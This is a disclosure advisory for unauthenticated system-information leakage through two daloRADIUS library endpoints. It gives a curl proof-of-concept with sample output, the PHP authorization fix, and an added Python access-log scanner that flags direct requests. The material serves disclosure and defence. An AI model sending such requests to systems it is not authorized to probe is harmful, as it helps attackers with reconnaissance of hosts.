Sensitive system information disclosure in lirantal/daloradius
Reported on
Dec 7th 2022
Description
An unauthenticated user can gather information on the remote system just by visiting the following endpoints:
- /library/exten-radius_server_info.php (which reveals pieces of information such as system uptime, CPU load, etc.)
- /library/exten-server_info.php (which reveals if mysql and/or freeradius are currently running)
Proof of Concept
$ curl http://<hostname>/library/exten-server_info.php
<h3>General Information</h3>
<table class='summarySection'>
<tr>
<td class='summaryKey'> Uptime </td>
<td class='summaryValue'><span class='sleft'>69 days 2 hours 24 minutes </span> </td>
</tr>
<tr>
<td class='summaryKey'> System Load </td>
<td class='summaryValue'><span class='sleft'>0.14 0.14 0.10<br/>Tasks: 29 total, 1 running, 28 sleeping, 0 stopped, 0 zombie<br/>%Cpu(s): 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st</span> </td>
</tr>
...
Impact
This vulnerability makes it easier for an attacker to gather information on the system hosting an instance of the vulnerable web application.
Fix
The issues have been corrected in the master branch. In particular, at the very beginning of each vulnerable file - exten-server_info.php and exten-radius_server_info.php - the following lines of code implement an authorization check:
...
$extension_file = '/library/exten-server_info.php';
// PHP_SELF holds the script path the browser requested. When this file is
// included from another page, PHP_SELF is that page's path, so the check
// only catches direct requests to the extension file and redirects them.
if (strpos($_SERVER['PHP_SELF'], $extension_file) !== false) {
    header("Location: ../index.php");
    exit;
}
...
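As an added detection example (not part of the advisory or of daloRADIUS itself), the following Python flags direct requests to the two endpoints in a web-server access log and separates responses that served a page (HTTP 200, the unpatched behaviour) from the redirect the patched check produces; the combined log format, the sample lines and the addresses in them are assumptions constructed for the example.

```python
import re
# Endpoints named in the advisory; the patched files redirect direct requests.
SENSITIVE_ENDPOINTS = (
    "/library/exten-server_info.php",
    "/library/exten-radius_server_info.php",
)
# Web-server "combined" access-log format (assumed for the sample lines below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (documentation-range addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Dec/2022:10:00:01 +0000] "GET /library/exten-server_info.php HTTP/1.1" 200 1894 "-" "curl/7.81.0"',
    '203.0.113.5 - - [07/Dec/2022:10:00:02 +0000] "GET /library/exten-radius_server_info.php?x=1 HTTP/1.1" 200 2210 "-" "curl/7.81.0"',
    '198.51.100.7 - - [08/Dec/2022:09:12:44 +0000] "GET /library/exten-server_info.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Dec/2022:09:12:45 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

def parse_line(line):
    """Split one access-log line into fields; None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["path"] = entry["path"].split("?", 1)[0]  # ignore the query string
    return entry

def classify(entry):
    """'leak': a direct request was served a page (HTTP 200, unpatched behaviour);
    'blocked': the patched check redirected it (3xx); None: not a sensitive file."""
    path = entry["path"]
    # Match the file itself, with or without trailing path info such as /x.
    if not any(path == ep or path.startswith(ep + "/") for ep in SENSITIVE_ENDPOINTS):
        return None
    if entry["status"] == 200:
        return "leak"
    return "blocked" if entry["status"] in (301, 302, 303) else "other"

def scan(lines):
    findings = []
    for line in lines:
        entry = parse_line(line)
        verdict = classify(entry) if entry else None
        if verdict:
            findings.append({"ip": entry["ip"], "path": entry["path"], "status": entry["status"], "verdict": verdict})
    return findings
```

Run `scan()` over your own access log after deploying the fix: any remaining "leak" verdict means an instance is still answering direct requests with content rather than the redirect.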